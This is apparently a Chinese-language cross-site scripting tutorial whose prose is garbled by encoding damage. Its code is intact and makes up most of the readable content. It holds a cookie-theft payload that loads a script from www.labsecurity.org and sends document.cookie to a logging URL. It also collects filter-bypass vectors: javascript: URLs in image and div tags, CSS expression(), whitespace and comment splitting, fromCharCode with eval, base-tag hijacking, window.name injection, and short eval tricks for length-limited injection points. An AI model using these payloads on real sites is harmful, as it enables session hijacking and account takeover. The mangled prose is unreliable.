XSSվű̽
XSSվűĻԭSQL ע빥ƣ˹۵㣩ϵͳִδ˵Σմ룬ͬXSSһֻҳűע뷽ʽҲǽűغдҳִԴﵽҳͻ˷ûĿģڿͻ˹SQLע빥ΣմƹıΪִеSQLִӶݿ⣬Ӷһ̽⡢ݿϢڷXSSǰࣨXSS bug ⣩
1XSS bugȻ
<script>alert(/XSS/)</script>
ڴXSS bugдԢ,ҳʱᵯԻ:
䱻ԭдҳִ.ôǾлִǵĽűغ:
<script src="http://www.labsecurity.org/xssbug.js"></script>
ǵռwww.labsecurity.orgϵxssbug.js
var img = document.createElement("img");
// the image request carries document.cookie to the logging endpoint as a query string
img.src = "http://www.labsecurity.org/log?" + escape(document.cookie);
document.body.appendChild(img);
ϴ˳ִ,ôĿվĵ¼cookieдlog.õcookie,·ͿԱݵ¼Ŀվ.(߿ͨûҲʹվԱ).
ȡcookieĴ뻻ߵַͿԽص߹©û.
ҲԽ뻻ĿûվϵijЩ ݰű.ʹڲ֪¡ԸijЩ.
Cookieȡķʹɣаȷˣ
ȻڣأӣӹôԱڿʱȻijЩΣչؼֵĹˣԼû볤ȣʹڣ©ȣҲֻܼ⣬ȴܹд빥غɣư
IMGͼƬԿվ
ȻҲ˵
<img src="javascript:alert(/XSS/)">
˵IJûϴͼƬʱͼƬ·ΪһοִеXSSԽű.
XSS©ôűͻᱻִ.űҪպ˫š>.
DIVǩԿվ
<div style="width:0;height:0;background:url(javascript:document.body.onload=function(){alert(/XSS/);})"></div>
֪¼
ƶЧ<marquee></marquee>
<marquee onstart=alert(/XSS/)></marquee>
<div style="" onmouseenter=alert(/XSS/)></div>
¼
<img style=# style="TEST:expression(alert(/XSS/))">
õ¼
<font style="TEST:expression(alert(/XSS/))"></font>
<li style="TEST:expression(alert(/XSS/))"></li>
<table style="TEST:expression(alert(/XSS/))"></table>
<a style="TEST:expression(alert(/XSS/))"></a>
<b style="TEST:expression(alert(/XSS/))"></b>
<ul style="TEST:expression(alert(/XSS/))"></ul>
<marquee style="TEST:expression(alert(/XSS/))"></marquee>
ͻƳԱĹ
javascriptոͻƹ
<img src = j ava script:al er t(/XSS/)>///ոʹTab
<img src = j
ava script :a ler t(/xss/)>
ע<img src = #/**/onerror = alert(/XSS/)>
ת,ƹ
ʹôСдתƹ
ʹýƱ
ոس
JS ԭ
String.fromCharCode()ԽASCII뻹ԭַ,ôͿeval(String.fromCharCode(97,108,101.....))
ͻƳ
עͷպڵﵽϲĿ
<input id = 1 type = text value=/>
<input id = 2 type = text value = />
ǿڵһ롱>alert<!--
ڵڶ--><script>(/XSS/);</script>
Ч
<input id = 1 type = text value= <script>alert(/XSS/)</script>/>
ʹ<base>ǩ·ٳ
<body>
<base href="http://www.labsecurity.org/">
<img src="evil.js">
</body>
ûʹbaseǩʱevil.jsǵõķĿ¼µevil.jsűļ.ʹ<base>ű.ôڴ˱ǩ·Ϊõվ.
˿ʹ<base>űٳ,Ȼд<img src=xxx.js>ͻƳ.
ʹwindow.nameַ
ԼĹҳд´
<script>
window.name = "<script src=http://www.labsecurity.org/xss.js><\/script>";
window.location = "http://www.xxxx.com/xxx.asp";
</script>
תĿҳʱǵwindow.nameֵΪõĿվű.
ǿʹeval(name)пվ.
չ
<div id="x">alert%28document.cookie%29%3B</div>
<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
DzƳȵİȫ,ôǾͿʹô˰ȫ.XSSͻƳ.
5.URL е
ҳﲻһ˵ĿɿHTML ô죿Щɿصģһ뵽ľURLͨURL βҪִеĴ룬ȻXSSͨ
document.URL/location.href ȷʽôִУӵ80 ַʼ
--code-------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)
<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
Length: 30
<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
Length: 31
ӶԱȣǰһӸ̣ôûа취أͨJavascript ֲ
String ķԷ֣иַһ̵ĺslice5 ַsubstr Ҫһַ
<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
Length: 29
<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
Length: 30
ôûа취أYESһMSND location IJοᷢиhash Աȡ#֮ݣôǿҪִеĴ#棬ȻͨhashôִУڻõ#ͷģֻҪslice һַͿõ룺
http://www.xssedsite.com/xssed.php?x=1....#alert(document.cookie)
<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
Length: 29
һַôԸô
6.аclipboardData
ԼҳͨclipboardData Payload да壬ȻڱXSS ҳȡִиݡ߹ҳ棺
--code-------------------------------------------------------------------------
<script>
clipboardData.setData("text", "alert(document.cookie)");
</script>
-------------------------------------------------------------------------------
XSS ҳ棺
--code-------------------------------------------------------------------------
<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 36
ַʽֻIE ϵУIE 7 ϰ汾аȫʾ